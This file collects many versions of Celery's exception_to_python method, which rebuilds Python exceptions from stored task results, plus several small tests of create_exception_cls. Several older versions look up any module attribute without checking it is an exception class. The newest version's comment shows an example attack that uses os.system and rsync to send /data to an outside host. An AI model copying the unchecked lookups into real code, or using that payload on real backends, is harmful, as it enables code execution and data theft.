def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
if exc:
if not isinstance(exc, BaseException):
exc_module = exc.get('exc_module')
if exc_module is None:
cls = create_exception_cls(from_utf8(exc['exc_type']),
__name__)
else:
exc_module = from_utf8(exc_module)
exc_type = from_utf8(exc['exc_type'])
try:
# Load module and find exception class in that
cls = sys.modules[exc_module]
# The type can contain qualified name with parent classes
for name in exc_type.split('.'):
cls = getattr(cls, name)
except (KeyError, AttributeError):
cls = create_exception_cls(exc_type,
celery.exceptions.__name__)
exc_msg = exc['exc_message']
try:
if isinstance(exc_msg, (tuple, list)):
exc = cls(*exc_msg)
else:
exc = cls(exc_msg)
except Exception as err: # noqa
exc = Exception(f'{cls}({exc_msg})')
if self.serializer in EXCEPTION_ABLE_CODECS:
exc = get_pickled_exception(exc)
return exc
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
if exc:
if not isinstance(exc, BaseException):
exc_module = exc.get('exc_module')
if exc_module is None:
cls = create_exception_cls(from_utf8(exc['exc_type']),
__name__)
else:
exc_module = from_utf8(exc_module)
exc_type = from_utf8(exc['exc_type'])
try:
cls = getattr(sys.modules[exc_module], exc_type)
except (KeyError, AttributeError):
cls = create_exception_cls(exc_type,
celery.exceptions.__name__)
exc_msg = exc['exc_message']
try:
if isinstance(exc_msg, tuple):
exc = cls(*exc_msg)
else:
exc = cls(exc_msg)
except Exception as err: # noqa
exc = Exception('{}({})'.format(cls, exc_msg))
if self.serializer in EXCEPTION_ABLE_CODECS:
exc = get_pickled_exception(exc)
return exc
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
if self.serializer in EXCEPTION_ABLE_CODECS:
return get_pickled_exception(exc)
elif not isinstance(exc, BaseException):
return create_exception_cls(from_utf8(exc['exc_type']),
__name__)(exc['exc_message'])
return exc
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
if not isinstance(exc, BaseException):
exc = create_exception_cls(
from_utf8(exc['exc_type']), __name__)(exc['exc_message'])
if self.serializer in EXCEPTION_ABLE_CODECS:
exc = get_pickled_exception(exc)
return exc
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
if exc:
if not isinstance(exc, BaseException):
exc_module = exc.get('exc_module')
if exc_module is None:
cls = create_exception_cls(
from_utf8(exc['exc_type']), __name__)
else:
exc_module = from_utf8(exc_module)
exc_type = from_utf8(exc['exc_type'])
try:
cls = getattr(sys.modules[exc_module], exc_type)
except KeyError:
cls = create_exception_cls(exc_type,
celery.exceptions.__name__)
exc_msg = exc['exc_message']
exc = cls(*exc_msg if isinstance(exc_msg, tuple) else exc_msg)
if self.serializer in EXCEPTION_ABLE_CODECS:
exc = get_pickled_exception(exc)
return exc
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
if exc:
if not isinstance(exc, BaseException):
exc_module = exc.get('exc_module')
if exc_module is None:
cls = create_exception_cls(from_utf8(exc['exc_type']),
__name__)
else:
exc_module = from_utf8(exc_module)
exc_type = from_utf8(exc['exc_type'])
cls = getattr(sys.modules[exc_module], exc_type)
exc_msg = exc['exc_message']
exc = cls(*exc_msg if isinstance(exc_msg, tuple) else exc_msg)
if self.serializer in EXCEPTION_ABLE_CODECS:
exc = get_pickled_exception(exc)
return exc
def test_create_exception_cls(self):
assert serialization.create_exception_cls('FooError', 'm')
assert serialization.create_exception_cls('FooError', 'm', KeyError)
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
if self.serializer in EXCEPTION_ABLE_CODECS:
return get_pickled_exception(exc)
return create_exception_cls(from_utf8(exc['exc_type']),
sys.modules[__name__])(exc['exc_message'])
def test_create_exception_cls(self):
self.assertTrue(serialization.create_exception_cls("FooError", "m"))
self.assertTrue(serialization.create_exception_cls("FooError",
"m",
KeyError))
def test_create_exception_cls(self):
self.assertTrue(serialization.create_exception_cls('FooError', 'm'))
self.assertTrue(
serialization.create_exception_cls('FooError', 'm', KeyError))
def test_create_exception_cls(self):
self.assertTrue(serialization.create_exception_cls('FooError', 'm'))
self.assertTrue(serialization.create_exception_cls('FooError', 'm',
KeyError))
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
if self.serializer in EXCEPTION_ABLE_CODECS:
return get_pickled_exception(exc)
return create_exception_cls(from_utf8(exc['exc_type']),
sys.modules[__name__])(exc['exc_message'])
def test_create_exception_cls(self):
self.assertTrue(serialization.create_exception_cls("FooError", "m"))
self.assertTrue(
serialization.create_exception_cls("FooError", "m", KeyError))
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
if not exc:
return None
elif isinstance(exc, BaseException):
if self.serializer in EXCEPTION_ABLE_CODECS:
exc = get_pickled_exception(exc)
return exc
elif not isinstance(exc, dict):
try:
exc = dict(exc)
except TypeError as e:
raise TypeError(f"If the stored exception isn't an "
f"instance of "
f"BaseException, it must be a dictionary.\n"
f"Instead got: {exc}") from e
exc_module = exc.get('exc_module')
try:
exc_type = exc['exc_type']
except KeyError as e:
raise ValueError("Exception information must include "
"the exception type") from e
if exc_module is None:
cls = create_exception_cls(
exc_type, __name__)
else:
try:
# Load module and find exception class in that
cls = sys.modules[exc_module]
# The type can contain qualified name with parent classes
for name in exc_type.split('.'):
cls = getattr(cls, name)
except (KeyError, AttributeError):
cls = create_exception_cls(exc_type,
celery.exceptions.__name__)
exc_msg = exc.get('exc_message', '')
# If the recreated exception type isn't indeed an exception,
# this is a security issue. Without the condition below, an attacker
# could exploit a stored command vulnerability to execute arbitrary
# python code such as:
# os.system("rsync /data [email protected]:~/data")
# The attacker sets the task's result to a failure in the result
# backend with the os as the module, the system function as the
# exception type and the payload
# rsync /data [email protected]:~/data
# as the exception arguments like so:
# {
# "exc_module": "os",
# "exc_type": "system",
# "exc_message": "rsync /data [email protected]:~/data"
# }
if not isinstance(cls, type) or not issubclass(cls, BaseException):
fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}'
raise SecurityError(
f"Expected an exception class, got {fake_exc_type} with payload {exc_msg}")
# XXX: Without verifying `cls` is actually an exception class,
# an attacker could execute arbitrary python code.
# cls could be anything, even eval().
try:
if isinstance(exc_msg, (tuple, list)):
exc = cls(*exc_msg)
else:
exc = cls(exc_msg)
except Exception as err: # noqa
exc = Exception(f'{cls}({exc_msg})')
return exc
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
if (self.app.conf["CELERY_RESULT_SERIALIZER"] in ("pickle", "yaml")):
return get_pickled_exception(exc)
return create_exception_cls(exc["exc_type"].encode("utf-8"),
sys.modules[__name__])
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
if app_or_default().conf["CELERY_RESULT_SERIALIZER"] in ("pickle", "yaml"):
return get_pickled_exception(exc)
return create_exception_cls(exc["exc_type"].encode("utf-8"), sys.modules[__name__])
